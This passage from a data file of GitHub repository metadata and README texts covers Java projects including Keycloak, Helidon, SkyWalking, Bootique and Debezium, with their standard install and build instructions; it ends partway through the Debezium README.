Sakai 21.5 ([release](http://source.sakaiproject.org/release/21.5/) | [fixes](https://confluence.sakaiproject.org/display/DOC/21.5+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+21+Release+Notes))
Sakai 20.6 ([release](http://source.sakaiproject.org/release/20.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/20.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+20+Release+Notes))
Sakai 19.6 ([release](http://source.sakaiproject.org/release/19.6/) | [fixes](https://confluence.sakaiproject.org/display/DOC/19.6+Fixes+by+tool) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+19+Release+Notes))
Sakai 12.7 ([release](http://source.sakaiproject.org/release/12.7/) | [notes](https://confluence.sakaiproject.org/display/DOC/Sakai+12+Release+Notes))
Sakai 11.4 ([release](http://source.sakaiproject.org/release/11.4/))
For full history of supported releases please see our [release information on confluence](https://confluence.sakaiproject.org/display/DOC/Sakai+Release+Date+list).
## Under Development
[Sakai 23.2](https://confluence.sakaiproject.org/display/REL/Sakai+23+Straw+person) is the current development release of Sakai 23. It is expected to release Q2 2024.
[Sakai 22.5](https://confluence.sakaiproject.org/display/REL/Sakai+22+Straw+person) is the current development release of Sakai 22. It is expected to release Q2 2024.
## Accessibility
[The Sakai Accessibility Working Group](https://confluence.sakaiproject.org/display/2ACC/Accessibility+Working+Group) is responsible for ensuring that the Sakai framework and its tools are accessible to persons with disabilities. [The Sakai Ra11y plan](https://confluence.sakaiproject.org/display/2ACC/rA11y+Plan) is working towards a VPAT and/or a WCAG2 certification.
CKSource has created a GPL licensed open source version of their [Accessibility Checker](https://cksource.com/ckeditor/services#accessibility-checker) that lets you inspect the accessibility level of content created in CKEditor and immediately solve any accessibility issues that are found. CKEditor is the open source rich text editor used throughout Sakai. While the Accessibility Checker, due to the GPL license, can not be bundled with Sakai, it can be used with Sakai and the A11y group has created [instructions](https://confluence.sakaiproject.org/display/2ACC/CKEditor+Accessibility+Checker) to help you.
## Skinning Sakai
Documentation on how to alter the Sakai skin (look and feel) is here https://github.com/sakaiproject/sakai/tree/master/library
## Translating Sakai
Translation, internationalization and localization of the Sakai project are coordinated by the Sakai Internationalization/localization community. This community maintains a publicly-accessible report that tracks what percentage of Sakai has been translated into various global languages and dialects. If the software is not yet available in your language, you can translate it with support from the broader Sakai Community to assist you.
From its inception, the Sakai project has been envisioned and designed for global use. Complete or majority-complete translations of Sakai are available in the languages listed below.
### Supported languages
| Locale | Language|
| ------ | ------ |
| en_US | English (Default) |
| ca_ES | Catalán |
| de_DE | German |
| es_ES | Español |
| eu | Euskera |
| fa_IR | Farsi |
| fr_FR | Français |
| hi_IN | Hindi |
| ja_JP | Japanese |
| mn | Mongolian |
| pt_BR | Portuguese (Brazil) |
| sv_SE | Swedish |
| tr_TR | Turkish |
| zh_CN | Chinese |
| ar | Arabic |
| ro_RO | Romanian |
| bg | Bulgarian |
| sr | Serbian |
### Other languages
Other languages have been declared legacy in Sakai 19 and have been moved to [Sakai Contrib as language packs](https://github.com/sakaicontrib/legacy-language-packs).
## Community (contrib) tools
A number of institutions have written additional tools for Sakai that they use in their local installations, but are not yet in an official release of Sakai. These are being collected at https://github.com/sakaicontrib where you will find information about each one. You might find just the thing you are after!
"
keycloak/keycloak,main,19774,6232,2013-07-02T13:38:51Z,497513,1964,Open Source Identity and Access Management For Modern Applications and Services,keycloak oidc saml,"![Keycloak](https://github.com/keycloak/keycloak-misc/blob/main/logo/logo.svg)
![GitHub Release](https://img.shields.io/github/v/release/keycloak/keycloak?label=latest%20release)
[![OpenSSF Best Practices](https://bestpractices.coreinfrastructure.org/projects/6818/badge)](https://bestpractices.coreinfrastructure.org/projects/6818)
![GitHub Repo stars](https://img.shields.io/github/stars/keycloak/keycloak?style=flat)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/keycloak/keycloak)
# Open Source Identity and Access Management
Add authentication to applications and secure services with minimum effort. No need to deal with storing users or authenticating users.
Keycloak provides user federation, strong authentication, user management, fine-grained authorization, and more.
## Help and Documentation
* [Documentation](https://www.keycloak.org/documentation.html)
* [User Mailing List](https://groups.google.com/d/forum/keycloak-user) - Mailing list for help and general questions about Keycloak
## Reporting Security Vulnerabilities
If you have found a security vulnerability, please look at the [instructions on how to properly report it](https://github.com/keycloak/keycloak/security/policy).
## Reporting an issue
If you believe you have discovered a defect in Keycloak, please open [an issue](https://github.com/keycloak/keycloak/issues).
Please remember to provide a good summary, description as well as steps to reproduce the issue.
## Getting started
To run Keycloak, download the distribution from our [website](https://www.keycloak.org/downloads.html). Unzip and run:
bin/kc.[sh|bat] start-dev
Alternatively, you can use the Docker image by running:
docker run quay.io/keycloak/keycloak start-dev
For more details refer to the [Keycloak Documentation](https://www.keycloak.org/documentation.html).
## Building from Source
To build from source, refer to the [building and working with the code base](docs/building.md) guide.
### Testing
To run tests, refer to the [running tests](docs/tests.md) guide.
### Writing Tests
To write tests, refer to the [writing tests](docs/tests-development.md) guide.
## Contributing
Before contributing to Keycloak, please read our [contributing guidelines](CONTRIBUTING.md). Participation in the Keycloak project is governed by the [CNCF Code of Conduct](https://github.com/cncf/foundation/blob/main/code-of-conduct.md).
## Other Keycloak Projects
* [Keycloak](https://github.com/keycloak/keycloak) - Keycloak Server and Java adapters
* [Keycloak QuickStarts](https://github.com/keycloak/keycloak-quickstarts) - QuickStarts for getting started with Keycloak
* [Keycloak Node.js Connect](https://github.com/keycloak/keycloak-nodejs-connect) - Node.js adapter for Keycloak
## License
* [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0)
"
TheAlgorithms/Java,master,56600,18522,2016-07-16T10:21:02Z,3975,5,All Algorithms implemented in Java,algorithm algorithm-challenges algorithms algorithms-datastructures data-structures hacktoberfest java search sort sorting-algorithms,"# The Algorithms - Java
[![Build](https://github.com/TheAlgorithms/Java/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/TheAlgorithms/Java/actions/workflows/build.yml)
[![codecov](https://codecov.io/gh/TheAlgorithms/Java/graph/badge.svg?token=XAdPyqTIqR)](https://codecov.io/gh/TheAlgorithms/Java)
[![Discord chat](https://img.shields.io/discord/808045925556682782.svg?logo=discord&colorB=7289DA&style=flat-square)](https://discord.gg/c7MnfGFGa6)
[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/TheAlgorithms/Java)
You can run and edit the algorithms, or contribute to them using Gitpod.io (a free online development environment) with a single click.
[![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/TheAlgorithms/Java)
### All algorithms are implemented in Java (for educational purposes)
These implementations are intended for learning purposes. As such, they may be less efficient than the Java standard library.
## Contribution Guidelines
Please read our [Contribution Guidelines](CONTRIBUTING.md) before you contribute to this project.
## Algorithms
Our [directory](DIRECTORY.md) has the full list of applications.
"
TencentCloud/TIMSDK,master,2518,2766,2019-01-17T07:35:20Z,877413,364,"Tencent Cloud Chat features a comprehensive suite of solutions including global access, one-to-one chat, group chat, message push, profile and relationship chain hosting, and account authentication. ",,"English | [简体中文](./README_ZH.md)
Notice: If you open a pull request in TUIKit Android or iOS and the corresponding changes are successfully merged, your name will be included in README.md with a hyperlink to your homepage on GitHub.
# Instant Messaging
## Product Introduction
Build fully featured real-time social messaging capabilities into your applications and websites, based on powerful and feature-rich chat APIs, SDKs, and UIKit components.
Android Experience App
iOS Experience App
TUIKit is a UI component library based on Tencent Cloud IM SDK. It provides universal UI components to offer features such as conversation, chat, search, relationship chain, group, and audio/video call features.
## Image Download
Tencent Cloud branch download address: [Download](https://im.sdk.qcloud.com/download/github/TIMSDK.zip)
## SDK Download
## Guidelines for Upgrading IMSDK to V2 APIs
[API Upgrade Guidelines](https://docs.qq.com/sheet/DS3lMdHpoRmpWSEFW)
## Latest Enhanced Version 7.9.5666 @2024.04.07
### SDK
- New visionOS SDK, compatible with Apple Vision Pro
- Group conversation supports message pinning
- Add the function of receiving group @ reminder offline notifications during Do Not Disturb mode
- Support setting friend remarks in the ""Accept Friend Request"" interface
- Add handling of invitations to join groups
- Upgrade vivo push package version in TIMPush
- Fix OV device crash issue in TIMPush
- Add OfflinePushExtInfo support for push through feature in TIMPush
- Fix the issue of not receiving the notification of being kicked out due to network disconnection
- Fix the issue of occasionally not receiving group messages when joining a live group immediately in the login callback
- Fix the issue of still receiving session change callbacks after receiving the delete session callback
- Fix the issue of occasional reset of local data in messages
- Fix the issue of frequent triggering of onRecvMessageModified callback when fetching historical messages
- Fix the issue of no return value and no support for optional values in some Swift interfaces
- Fix the multi-endpoint login exception caused by iCloud sync between different types of devices with the same AppleID
- Fix related issues of communities and topics
- Fix the issue of failing to fetch historical messages on HarmonyOS platform
- Upgrade libcurl in Windows platform to 8.4.0
- Fix the issue of duplicate summary in merged forwarded messages in C++ interface
- Fix the issue of unable to download large images in C++ interface
- Fix the issue of incorrect group type in C++ interface
- Fix the issue of unable to set message custom data in C++ interface
- Fix the forwarding message failure in C++ interface
### TUIKit & Demo
- iOS components provide PrivacyInfo.xcprivacy privacy list file
- TUIChatBot plugin supports markdown text display
- TUIChat chat page header supports displaying call status
"
helidon-io/helidon,main,3387,551,2018-08-27T11:03:52Z,94032,550,Java libraries for writing microservices,java microprofile microservice-framework netty reactive,"
# Helidon: Java Libraries for Microservices
Project Helidon is a set of Java Libraries for writing microservices.
Helidon supports two programming models:
* Helidon MP: [MicroProfile 6.0](https://github.com/eclipse/microprofile/releases/tag/6.0)
* Helidon SE: a small, functional style API
In either case your application is a Java SE program running on the
new Helidon Níma WebServer that has been written from the ground up to
use Java 21 Virtual Threads. With Helidon 4 you get the high throughput of a reactive server with the simplicity of thread-per-request style programming.
The Helidon SE API in Helidon 4 has changed significantly from Helidon 3. The use of virtual threads has enabled these APIs to change from asynchronous to blocking. This results in much simpler code that is easier to write, maintain, debug and understand. Earlier Helidon SE code will require modification to run on these new APIs. For more information see the [Helidon SE Upgrade Guide](https://helidon.io/docs/v4/#/se/guides/upgrade_4x).
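As a rough illustration of that blocking, thread-per-request style, here is a minimal Helidon SE server sketch; the route path and greeting are made up, and the exact builder API should be checked against the Helidon 4 documentation:
```java
import io.helidon.webserver.WebServer;

public class Main {
    public static void main(String[] args) {
        // Each request is handled on a virtual thread, so the handler can block freely.
        WebServer server = WebServer.builder()
                .routing(routing -> routing
                        .get(""/greet"", (req, res) -> res.send(""Hello from Helidon SE!"")))
                .port(8080)
                .build()
                .start();

        System.out.println(""Server started at http://localhost:"" + server.port());
    }
}
```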
Helidon 4 supports MicroProfile 6. This means your existing Helidon MP 3.x applications will run on Helidon 4 with only minor modifications. And since Helidon’s MicroProfile server is based on the new Níma WebServer you get all the benefits of running on virtual threads. For more information see the [Helidon MP Upgrade Guide](https://helidon.io/docs/v4/#/mp/guides/upgrade_4x).
New to Helidon? Then jump in and [get started](https://helidon.io/docs/v4/#/about/prerequisites).
Java 21 is required to use Helidon 4.
## License
Helidon is available under Apache License 2.0.
## Documentation
Latest documentation and javadocs are available at https://helidon.io/docs/v4.
Helidon White Paper is available [here](https://www.oracle.com/a/ocom/docs/technical-brief--helidon-report.pdf).
## Get Started
See [Getting Started](https://helidon.io/docs/v4/#/about/prerequisites).
## Downloads / Accessing Binaries
There are no Helidon downloads. Just use our Maven releases (GroupID `io.helidon`).
See [Getting Started](https://helidon.io/docs/v4/#/about/prerequisites).
## Helidon CLI
macOS:
```bash
curl -O https://helidon.io/cli/latest/darwin/helidon
chmod +x ./helidon
sudo mv ./helidon /usr/local/bin/
```
Linux:
```bash
curl -O https://helidon.io/cli/latest/linux/helidon
chmod +x ./helidon
sudo mv ./helidon /usr/local/bin/
```
Windows:
```bat
PowerShell -Command Invoke-WebRequest -Uri ""https://helidon.io/cli/latest/windows/helidon.exe"" -OutFile ""C:\Windows\system32\helidon.exe""
```
See this [document](HELIDON-CLI.md) for more info.
## Build
You need JDK 21 to build Helidon 4.
You also need Maven. We recommend 3.8.0 or newer.
**Full build**
```bash
$ mvn install
```
**Checkstyle**
```bash
# cd to the component you want to check
$ mvn validate -Pcheckstyle
```
**Copyright**
```bash
# cd to the component you want to check
$ mvn validate -Pcopyright
```
**Spotbugs**
```bash
# cd to the component you want to check
$ mvn verify -Pspotbugs
```
**Documentation**
```bash
# At the root of the project
$ mvn site
```
**Build Scripts**
Build scripts are located in `etc/scripts`. These are primarily used by our pipeline,
but a couple are handy to use on your desktop to verify your changes.
* `copyright.sh`: Run a full copyright check
* `checkstyle.sh`: Run a full style check
## Get Help
* See the [Helidon FAQ](https://github.com/oracle/helidon/wiki/FAQ)
* Ask questions on Stack Overflow using the [helidon tag](https://stackoverflow.com/tags/helidon)
* Join us on Slack: [#helidon-users](http://slack.helidon.io)
## Get Involved
* Learn how to [contribute](CONTRIBUTING.md)
* See [issues](https://github.com/oracle/helidon/issues) for issues you can help with
## Stay Informed
* Twitter: [@helidon_project](https://twitter.com/helidon_project)
* Blog: [Helidon on Medium](https://medium.com/helidon)
"
elastic/elasticsearch,main,67512,24082,2010-02-08T13:20:56Z,1182385,4736,"Free and Open, Distributed, RESTful Search Engine",elasticsearch java search-engine,
HelloWorld521/Java,master,2998,1422,2016-12-08T14:01:46Z,28772,63,Java hands-on project exercises,java,"# Java
##### [中文](README_ZH.md)
## Project Descriptions
Below are some of my Java project exercises. I would like to share them with everyone, and I hope we can all improve together!
## Java Projects
* [swagger2-boot-starter](https://github.com/HelloWorld521/swagger2-boot-starter)
* [SpringBoot-Shiro](./springboot-shiro/)
* [SECKILL](./seckill/)
* [Woss2.0 ](./woss/)
* [tomcatServlet3.0 Web Server](./tomcatServer3.0/)
* [ServletAjax ](./ServletAjax/)
* [JspChat jsp Chatroom](./JspChat/)
* [eStore library system](./estore/)
* [checkcode Java captcha code generator](./checkcode/)
* [IMOOCSpider easy internet spider](./IMOOCSpider/)
## Last
If any of the projects above helps you out, please click ""Star"" at the top right. Thank you!
"
apache/skywalking,master,23239,6422,2015-11-07T03:30:36Z,170097,58,"APM, Application Performance Monitoring System",apm dapper distributed-tracing ebpf logging metrics observability open-telemetry prometheus service-mesh skywalking telegraf web-performance zabbix,"Apache SkyWalking
==========
**SkyWalking**: an APM (Application Performance Monitoring) system, especially designed for
microservices, cloud native and container-based architectures.
[![GitHub stars](https://img.shields.io/github/stars/apache/skywalking.svg?style=for-the-badge&label=Stars&logo=github)](https://github.com/apache/skywalking)
[![Twitter Follow](https://img.shields.io/twitter/follow/asfskywalking.svg?style=for-the-badge&label=Follow&logo=twitter)](https://twitter.com/AsfSkyWalking)
[![Maven Central](https://img.shields.io/maven-central/v/org.apache.skywalking/apache-skywalking-apm.svg)](http://skywalking.apache.org/downloads/)
# Abstract
**SkyWalking** is an open-source APM system that provides monitoring, tracing and diagnosing capabilities for distributed systems in Cloud Native architectures.
* Distributed Tracing
* End-to-end distributed tracing. Service topology analysis, service-centric observability and APIs dashboards.
* Agents for your stack
* Java, .Net Core, PHP, NodeJS, Golang, LUA, Rust, C++, Client JavaScript and Python agents with active development and maintenance.
* eBPF early adoption
* Rover agent works as a monitor and profiler powered by eBPF to monitor Kubernetes deployments and diagnose CPU and network performance.
* Scaling
* 100+ billion telemetry data points can be collected and analyzed by one SkyWalking cluster.
* Mature Telemetry Ecosystems Supported
* Metrics, Traces, and Logs from mature ecosystems are supported, e.g. Zipkin, OpenTelemetry, Prometheus, Zabbix, Fluentd
* Native APM Database
* BanyanDB, an observability database, created in 2022, aims to ingest, analyze and store telemetry/observability data.
* Consistent Metrics Aggregation
* The SkyWalking native meter format and widely known metrics formats (e.g. OpenTelemetry, Telegraf, Zabbix) are processed through the same script pipeline.
* Log Management Pipeline
* Supports log formatting, metrics extraction, and various sampling policies through a high-performance script pipeline.
* Alerting and Telemetry Pipelines
* Supports service-centric, deployment-centric, and API-centric alarm rules. Supports forwarding alarms and all telemetry data to 3rd-party systems.
# Live Demo
- Find the [SkyWalking live demo with native UI and Grafana](https://skywalking.apache.org/#demo), and [screenshots](https://skywalking.apache.org/#arch) on our website.
- Follow the [showcase](https://skywalking.apache.org/docs/skywalking-showcase/next/readme/) to set up a preview deployment quickly.
# Documentation
- [Official documentation](https://skywalking.apache.org/docs/#SkyWalking)
# Downloads
Please head to the [releases page](https://skywalking.apache.org/downloads/) to download a release of Apache SkyWalking.
# Compiling project
Follow this [document](docs/en/guides/How-to-build.md).
# Code of conduct
This project adheres to the Contributor Covenant [code of conduct](https://www.apache.org/foundation/policies/conduct). By participating, you are expected to uphold this code.
Please follow the [REPORTING GUIDELINES](https://www.apache.org/foundation/policies/conduct#reporting-guidelines) to report unacceptable behavior.
# Contact Us
* Mail list: **dev@skywalking.apache.org**. Mail to `dev-subscribe@skywalking.apache.org`, then follow the reply to subscribe to the mailing list.
* Send a `Request to join SkyWalking slack` mail to the mail list (`dev@skywalking.apache.org`), and we will invite you in.
* For Chinese speakers, send a `[CN] Request to join SkyWalking slack` mail to the mail list (`dev@skywalking.apache.org`), and we will invite you in.
* Twitter, [ASFSkyWalking](https://twitter.com/AsfSkyWalking)
* [Bilibili videos](https://space.bilibili.com/390683219)
* [Juejin posts](https://juejin.cn/user/13673577331607/posts)
# Our Users
Hundreds of companies and organizations use SkyWalking for research, production, and commercial purposes.
Visit our [website](http://skywalking.apache.org/users/) to find the user page.
# License
[Apache 2.0 License.](LICENSE)
"
ag2s20150909/TTS,master,2586,316,2021-05-09T07:38:35Z,36177,70,,,
bootique/bootique,master,1412,282,2015-12-10T14:45:15Z,2958,28,Bootique is a minimally opinionated platform for modern runnable Java apps.,bootique dependency-injection guice java runnable-jar,"
[![build test deploy](https://github.com/bootique/bootique/workflows/build%20test%20deploy/badge.svg)](https://github.com/bootique/bootique/actions)
[![Maven Central](https://img.shields.io/maven-central/v/io.bootique/bootique.svg?colorB=brightgreen)](https://search.maven.org/artifact/io.bootique/bootique)
Bootique is a [minimally opinionated](https://medium.com/@andrus_a/bootique-a-minimally-opinionated-platform-for-modern-java-apps-644194c23872#.odwmsbnbh)
java launcher and integration technology. It is intended for building container-less runnable Java applications.
With Bootique you can create REST services, webapps, jobs, DB migration tasks, etc. and run them as if they were
simple commands. No JavaEE container required! Among other things Bootique is an ideal platform for
Java [microservices](http://martinfowler.com/articles/microservices.html), as it allows you to create a fully-functional
app with minimal setup.
Each Bootique app is a collection of modules interacting with each other via dependency injection. This GitHub project
provides Bootique core. Bootique team also develops a number of important modules. A full list is available
[here](http://bootique.io/docs/).
## Quick Links
* [WebSite](https://bootique.io)
* [Getting Started](https://bootique.io/docs/2.x/getting-started/)
* [Docs](https://bootique.io/docs/) - documentation collection for Bootique core and all standard
modules.
## Support
You have two options:
* [Open an issue](https://github.com/bootique/bootique/issues) on GitHub with a label of ""help wanted"" or ""question""
(or ""bug"" if you think you found a bug).
* Post a question on the [Bootique forum](https://groups.google.com/forum/#!forum/bootique-user).
## TL;DR
For the impatient, here is how to get started with Bootique:
* Declare the official module collection:
```xml
<dependencyManagement>
    <dependencies>
        <dependency>
            <groupId>io.bootique.bom</groupId>
            <artifactId>bootique-bom</artifactId>
            <version>3.0-M3</version>
            <type>pom</type>
            <scope>import</scope>
        </dependency>
    </dependencies>
</dependencyManagement>
```
* Include the modules that you need:
```xml
<dependency>
    <groupId>io.bootique.jersey</groupId>
    <artifactId>bootique-jersey</artifactId>
</dependency>
<dependency>
    <groupId>io.bootique.logback</groupId>
    <artifactId>bootique-logback</artifactId>
</dependency>
```
* Write your app:
```java
package com.foo;
import io.bootique.Bootique;
public class Application {
public static void main(String[] args) {
Bootique
.app(args)
.autoLoadModules()
.exec()
.exit();
}
}
```
It has a ```main()``` method, so you can run it!
*For a more detailed tutorial proceed to [this link](https://bootique.io/docs/2.x/getting-started/).*
## Upgrading
See the ""maven-central"" badge above for the current production version of ```bootique-bom```.
When upgrading, don't forget to check [upgrade notes](https://github.com/bootique/bootique/blob/master/UPGRADE.md)
specific to your version.
"
debezium/debezium,main,9854,2385,2016-01-22T20:17:05Z,50856,64,Change data capture for a variety of databases. Please log issues at https://issues.redhat.com/browse/DBZ.,apache-kafka cdc change-data-capture database debezium event-streaming kafka kafka-connect kafka-producer,"[![License](http://img.shields.io/:license-apache%202.0-brightgreen.svg)](http://www.apache.org/licenses/LICENSE-2.0.html)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.debezium/debezium-parent/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22io.debezium%22)
[![User chat](https://img.shields.io/badge/chat-users-brightgreen.svg)](https://debezium.zulipchat.com/#narrow/stream/302529-users)
[![Developer chat](https://img.shields.io/badge/chat-devs-brightgreen.svg)](https://debezium.zulipchat.com/#narrow/stream/302533-dev)
[![Google Group](https://img.shields.io/:mailing%20list-debezium-brightgreen.svg)](https://groups.google.com/forum/#!forum/debezium)
[![Stack Overflow](http://img.shields.io/:stack%20overflow-debezium-brightgreen.svg)](http://stackoverflow.com/questions/tagged/debezium)
Copyright Debezium Authors.
Licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0).
The Antlr grammars within the debezium-ddl-parser module are licensed under the [MIT License](https://opensource.org/licenses/MIT).
English | [Chinese](README_ZH.md) | [Japanese](README_JA.md) | [Korean](README_KO.md)
# Debezium
Debezium is an open source project that provides a low latency data streaming platform for change data capture (CDC). You set up and configure Debezium to monitor your databases, and then your applications consume events for each row-level change made to the database. Only committed changes are visible, so your application doesn't have to worry about transactions or changes that are rolled back. Debezium provides a single model of all change events, so your application does not have to worry about the intricacies of each kind of database management system. Additionally, since Debezium records the history of data changes in durable, replicated logs, your application can be stopped and restarted at any time, and it will be able to consume all of the events it missed while it was not running, ensuring that all events are processed correctly and completely.
Monitoring databases and being notified when data changes has always been complicated. Relational database triggers can be useful, but are specific to each database and often limited to updating state within the same database (not communicating with external processes). Some databases offer APIs or frameworks for monitoring changes, but there is no standard so each database's approach is different and requires a lot of knowledge and specialized code. It is still very challenging to ensure that all changes are seen and processed in the same order while minimally impacting the database.
Debezium provides modules that do this work for you. Some modules are generic and work with multiple database management systems, but are also a bit more limited in functionality and performance. Other modules are tailored for specific database management systems, so they are often far more capable and they leverage the specific features of the system.
## Basic architecture
Debezium is a change data capture (CDC) platform that achieves its durability, reliability, and fault tolerance qualities by reusing Kafka and Kafka Connect. Each connector deployed to the Kafka Connect distributed, scalable, fault tolerant service monitors a single upstream database server, capturing all of the changes and recording them in one or more Kafka topics (typically one topic per database table). Kafka ensures that all of these data change events are replicated and totally ordered, and allows many clients to independently consume these same data change events with little impact on the upstream system. Additionally, clients can stop consuming at any time, and when they restart they resume exactly where they left off. Each client can determine whether they want exactly-once or at-least-once delivery of all data change events, and all data change events for each database/table are delivered in the same order they occurred in the upstream database.
Applications that don't need or want this level of fault tolerance, performance, scalability, and reliability can instead use Debezium's *embedded connector engine* to run a connector directly within the application space. These applications still want the same data change events, but prefer to have the connectors send them directly to the application rather than persisting them inside Kafka.
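As a hedged sketch of what using the embedded engine can look like, the snippet below uses the `io.debezium.engine.DebeziumEngine` API; the connector class, offset file location, and topic prefix are placeholder values, and real configurations need additional database connection properties:
```java
import java.util.Properties;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

import io.debezium.engine.ChangeEvent;
import io.debezium.engine.DebeziumEngine;
import io.debezium.engine.format.Json;

public class EmbeddedEngineExample {
    public static void main(String[] args) {
        // Placeholder configuration; real deployments also need database host, user, password, etc.
        Properties props = new Properties();
        props.setProperty(""name"", ""example-engine"");
        props.setProperty(""connector.class"", ""io.debezium.connector.postgresql.PostgresConnector"");
        props.setProperty(""offset.storage"", ""org.apache.kafka.connect.storage.FileOffsetBackingStore"");
        props.setProperty(""offset.storage.file.filename"", ""/tmp/offsets.dat"");
        props.setProperty(""topic.prefix"", ""example"");

        // The engine pushes change events straight to the application instead of Kafka.
        DebeziumEngine<ChangeEvent<String, String>> engine = DebeziumEngine.create(Json.class)
                .using(props)
                .notifying(record -> System.out.println(record.value()))
                .build();

        // DebeziumEngine is a Runnable (and Closeable); run it on its own thread and close it on shutdown.
        ExecutorService executor = Executors.newSingleThreadExecutor();
        executor.execute(engine);
    }
}
```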
## Common use cases
There are a number of scenarios in which Debezium can be extremely valuable, but here we outline just a few of them that are more common.
### Cache invalidation
Automatically invalidate entries in a cache as soon as the record(s) for entries change or are removed. If the cache is running in a separate process (e.g., Redis, Memcache, Infinispan, and others), then the simple cache invalidation logic can be placed into a separate process or service, simplifying the main application. In some situations, the logic can be made a little more sophisticated and can use the updated data in the change events to update the affected cache entries.
### Simplifying monolithic applications
Many applications update a database and then do additional work after the changes are committed: update search indexes, update a cache, send notifications, run business logic, etc. This is often called ""dual-writes"" since the application is writing to multiple systems outside of a single transaction. Not only is the application logic complex and more difficult to maintain, dual writes also risk losing data or making the various systems inconsistent if the application were to crash after a commit but before some/all of the other updates were performed. Using change data capture, these other activities can be performed in separate threads or separate processes/services when the data is committed in the original database. This approach is more tolerant of failures, does not miss events, scales better, and more easily supports upgrading and operations.
### Sharing databases
When multiple applications share a single database, it is often non-trivial for one application to become aware of the changes committed by another application. One approach is to use a message bus, although non-transactional message busses suffer from the ""dual-writes"" problems mentioned above. However, this becomes very straightforward with Debezium: each application can monitor the database and react to the changes.
### Data integration
Data is often stored in multiple places, especially when it is used for different purposes and has slightly different forms. Keeping the multiple systems synchronized can be challenging, but simple ETL-type solutions can be implemented quickly with Debezium and simple event processing logic.
### CQRS
The [Command Query Responsibility Separation (CQRS)](http://martinfowler.com/bliki/CQRS.html) architectural pattern uses one data model for updating and one or more other data models for reading. As changes are recorded on the update-side, those changes are then processed and used to update the various read representations. As a result, CQRS applications are usually more complicated, especially when they need to ensure reliable and totally-ordered processing. Debezium and CDC can make this more approachable: writes are recorded as normal, but Debezium captures those changes in durable, totally ordered streams that are consumed by the services that asynchronously update the read-only views. The write-side tables can represent domain-oriented entities, or when CQRS is paired with [Event Sourcing](http://martinfowler.com/eaaDev/EventSourcing.html) the write-side tables are the append-only event log of commands.
## Building Debezium
The following software is required to work with the Debezium codebase and build it locally:
* [Git](https://git-scm.com) 2.2.1 or later
* JDK 17 or later, e.g. [OpenJDK](http://openjdk.java.net/projects/jdk/)
* [Docker Engine](https://docs.docker.com/engine/install/) or [Docker Desktop](https://docs.docker.com/desktop/) 1.9 or later
* [Apache Maven](https://maven.apache.org/index.html) 3.8.4 or later
(or invoke the wrapper with `./mvnw` for Maven commands)
See the links above for installation instructions on your platform. You can verify the versions are installed and running:
$ git --version
$ javac -version
$ mvn -version
$ docker --version
### Why Docker?
Many open source software projects use Git, Java, and Maven, but requiring Docker is less common. Debezium is designed to talk to a number of external systems, such as various databases and services, and our integration tests verify Debezium does this correctly. But rather than expect you have all of these software systems installed locally, Debezium's build system uses Docker to automatically download or create the necessary images and start containers for each of the systems. The integration tests can then use these services and verify Debezium behaves as expected, and when the integration tests finish, Debezium's build will automatically stop any containers that it started.
Debezium also has a few modules that are not written in Java, and so they have to be built on the target operating system. Docker lets our build do this using images with the target operating system(s) and all necessary development tools.
Using Docker has several advantages:
1. You don't have to install, configure, and run specific versions of each external service on your local machine, or have access to them on your local network. Even if you do, Debezium's build won't use them.
1. We can test multiple versions of an external service. Each module can start whatever containers it needs, so different modules can easily use different versions of the services.
1. Everyone can run complete builds locally. You don't have to rely upon a remote continuous integration server running the build in an environment set up with all the required services.
1. All builds are consistent. When multiple developers each build the same codebase, they should see exactly the same results -- as long as they're using the same or equivalent JDK, Maven, and Docker versions. That's because the containers will be running the same versions of the services on the same operating systems. Plus, all of the tests are designed to connect to the systems running in the containers, so nobody has to fiddle with connection properties or custom configurations specific to their local environments.
1. No need to clean up the services, even if those services modify and store data locally. Docker *images* are cached, so reusing them to start containers is fast and consistent. However, Docker *containers* are never reused: they always start in their pristine initial state, and are discarded when they are shut down. Integration tests rely upon containers, and so cleanup is handled automatically.
### Configure your Docker environment
The Docker Maven Plugin will resolve the docker host by checking the following environment variables:
export DOCKER_HOST=tcp://10.1.2.2:2376
export DOCKER_CERT_PATH=/path/to/cdk/.vagrant/machines/default/virtualbox/.docker
export DOCKER_TLS_VERIFY=1
These can be set automatically if using Docker Machine or something similar.
### Building the code
First obtain the code by cloning the Git repository:
$ git clone https://github.com/debezium/debezium.git
$ cd debezium
Then build the code using Maven:
$ mvn clean verify
The build starts and uses several Docker containers for different DBMSes. Note that if Docker is not running or configured, you'll likely get an arcane error -- if this is the case, always verify that Docker is running, perhaps by using `docker ps` to list the running containers.
### Don't have Docker running locally for builds?
You can skip the integration tests and docker-builds with the following command:
$ mvn clean verify -DskipITs
### Building just the artifacts, without running tests, CheckStyle, etc.
You can skip all non-essential plug-ins (tests, integration tests, CheckStyle, formatter, API compatibility check, etc.) using the ""quick"" build profile:
$ mvn clean verify -Dquick
This provides the fastest way to produce just the output artifacts, without running any of the QA-related Maven plug-ins.
This comes in handy for producing connector JARs and/or archives as quickly as possible, e.g. for manual testing in Kafka Connect.
### Running tests of the Postgres connector using the wal2json or pgoutput logical decoding plug-ins
The Postgres connector supports three logical decoding plug-ins for streaming changes from the DB server to the connector: decoderbufs (the default), wal2json, and pgoutput.
To run the integration tests of the PG connector using wal2json, enable the ""wal2json-decoder"" build profile:
$ mvn clean install -pl :debezium-connector-postgres -Pwal2json-decoder
To run the integration tests of the PG connector using pgoutput, enable the ""pgoutput-decoder"" and ""postgres-10"" build profiles:
$ mvn clean install -pl :debezium-connector-postgres -Ppgoutput-decoder,postgres-10
A few tests currently don't pass when using the wal2json plug-in.
Look for references to the types defined in `io.debezium.connector.postgresql.DecoderDifferences` to find these tests.
### Running tests of the Postgres connector with specific Apicurio Version
